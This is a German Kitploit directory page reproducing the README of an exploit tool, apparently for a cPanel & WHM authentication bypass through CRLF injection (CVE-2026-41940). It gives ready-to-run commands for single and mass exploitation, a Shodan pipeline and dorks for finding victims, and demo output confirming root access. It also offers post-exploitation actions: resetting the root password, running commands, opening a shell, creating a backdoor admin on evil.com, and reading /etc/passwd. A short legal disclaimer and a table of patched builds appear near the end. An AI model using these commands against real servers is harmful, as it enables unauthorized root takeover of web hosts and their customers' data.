Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — # cPanel & WHM - Authentifizierungsumgehung durch CRLF-Injektion in Session-Dateien | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

# cPanel & WHM - Authentifizierungsumgehung durch CRLF-Injektion in Session-Dateien

Repository anzeigen
1vor 10h 20mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 CVE-2026-41940 – cPanel & WHM Auth Bypass

cPanel

⚡ Unauthenticated Root – Session‑File CRLF Injection ⚡
„Ein Exploit, um sie alle zu knechten.“

Python License No deps CVSS


🧠 Der Exploit in Kürze

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  Stage 1  ──  Mint a pre‑auth session cookie              │
│  Stage 2  ──  CRLF injection via `Authorization` header   │
│  Stage 3  ──  Fire `do_token_denied` (raw → cache)       │
│  Stage 4  ──  Verify WHM root access via JSON API        │
└─────────────────────────────────────────────────────────────┘

💥 Ergebnis – Voller Root-Zugriff auf WHM, ohne Anmeldedaten.


📜 Lizenz

Dieses Projekt wird unter der MIT-Lizenz veröffentlicht – du darfst es frei verwenden, modifizieren und verbreiten, aber sei nicht böse 😈.
Details findest du in der Datei LICENSE.


🛠️ Installation – Im Grunde eine einzige Zeile

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

Null Abhängigkeiten – nur die Python-3-Standardbibliothek.
Du brauchst kein pip, virtualenv oder sonstigen Schnickschnack.


🚀 Schnellstart – Jetzt ausführen

Einzelnes Ziel

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

Massen-Scan aus Datei

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

Aus der Wildnis pipen (Shodan, subfinder, etc.)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 Befehlszeilenoptionen (das gute Zeug)


💀 Post-Exploitation-Arsenal

Sobald du die Box geknackt hast, kannst du:

  • 🔍 Alle cPanel-Konten auflisten – --action list
  • 🔑 Root-Passwort ändern – --action passwd --passwd "h4ck3d!"
  • 🖥️ OS-Befehle ausführen – --action cmd --cmd "id;whoami"
  • 📡 Interaktive Shell – --action shell (vollständiges WHM-Terminal)
  • 👤 Backdoor-Admin erstellen – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 Dateien lesen (über Shell) – cat /etc/passwd
  • 📊 Serverinformationen sammeln – --action info

🧪 Demo – Was du sehen wirst

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : scan only

[10:23:15] [SCAN] Starting 4-stage exploit chain... https://192.168.1.100:2087
[10:23:15] [INFO] Canonical hostname discovered: server.example.com
[10:23:15] [STEP] Stage 1/4 — Minting preauth session...
[10:23:16] [  OK] Stage1: preauth session = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Stage 2/4 — CRLF injection via Authorization header...
[10:23:17] [  OK] Stage2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
[10:23:18] [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
[10:23:18] [STEP] Stage 4/4 — Verifying WHM root access...
[10:23:18] [INFO] Stage4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.118.0.63 — CONFIRMED vulnerable)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Session  : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Version  : 11.118.0.63
[10:23:18] [PWND]   API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — Scan Complete
  Time: 3.2s  ·  Targets: 1

  1 VULNERABLE TARGET(S)

  [*] Target   : https://192.168.1.100:2087
  [*] Version  : 11.118.0.63
  [*] Token    : /cpsess1234567890
  [*] API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Session  : 9a7f8e3d2c1b0a9f
  [*] Evidence : {"version":"11.118.0.63",...}

🔎 Shodan-Dorks (finde deine Beute)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 Betroffene Versionen – Patch-Status

Alle Versionen unterhalb dieser Builds sind verwundbar.


🕵️‍♂️ Autor & Credits

0xgh057r3c0n – Sicherheitsforscher, Reverse Engineer und Koffein-Junkie.
GitHub | Twitter


⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke gedacht.
Unautorisierter Zugriff auf Computersysteme ist illegal. Der Autor und die Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.
Nutze es verantwortungsvoll und hole immer zuerst die Erlaubnis ein.


🌟 Unterstützung / Mitwirken

  • Einen Fehler gefunden? Öffne ein Issue.
  • Code verbessern? Pull Requests sind willkommen.
  • Tool gefallen? Gib ihm einen ⭐ auf GitHub!

🔥 Hacke den Planeten, aber bleib legal. 🔥

Tool herunterladen
FlagBeschreibung
-u, --urlEinzelne Ziel-URL (z. B. https://host:2087)
-l, --listDatei mit einer URL pro Zeile
--hostnameKanonischen Host-Header überschreiben (automatisch erkannt)
-t, --threadsThreads (Standard: 10)
--timeoutTimeout in Sekunden (Standard: 15)
--rate-limitPause zwischen Zielen (Sekunden)
--actionPost-Exploit: list, passwd, cmd, exec, info, version, shell, adduser
--passwdNeues Root-Passwort (mit --action passwd)
--cmdOS-Befehl (mit --action cmd/exec)
--new-userNeuer cPanel-Benutzername (mit --action adduser)
--new-domainNeue cPanel-Domain (mit --action adduser)
-o, --outputErgebnisse als JSON speichern
BranchGepatchter BuildStatus
11.11011.110.0.97🛡️ Behoben
11.11811.118.0.63🛡️ Behoben
11.12611.126.0.54🛡️ Behoben
11.13211.132.0.29🛡️ Behoben
11.13411.134.0.20🛡️ Behoben
11.13611.136.0.5🛡️ Behoben